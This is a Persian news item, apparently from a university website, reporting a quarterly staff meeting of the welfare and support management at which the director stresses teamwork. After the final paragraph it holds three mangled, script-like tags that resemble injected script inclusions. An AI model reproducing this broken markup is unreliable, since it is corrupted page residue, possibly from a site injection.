برگزاری جلسه فصلی مدیر امور پشتیبانی و رفاهی دانشگاه با کارکنان واحد های این مدیریت

جلسه فصلی مدیریت امور رفاهی و پشتیبانی دانشگاه با حضور آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه  برگزار شد.

جلسه فصلی و داخلی مدیریت امور رفاهی و پشتیبانی  با حضور آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه و کلیه کارشناسان و کارکنان این واحد برگزار شد.

در این جلسه فصلی، آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه ضمن تاکید بر عملکرد منسجم و پیوسته کارکنان در کنار یکدیگر، موفقیت هرمجموعه ای را منوط به کار تیمی و هم بستگی قوی میان آنان عنوان کرد.

وی در ادامه افزود: در شرایط فعلی دانشگاه، اقدامات انجام شده باید بر پایه کار تیمی صورت گیرد تا به بهترین شکل بتوان از معبرهای پیش رو عبور کرد.

در ادامه مسئولین و کارشناسان حوزه مدیریت امور رفاهی و پشتیبانی دانشگاه ضمن اظهار نقطه نظرات خود، نقاط قوت و قابل بهبود را عنوان کردند و همه موضوعات مورد بحث و بررسی قرار گرفت.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *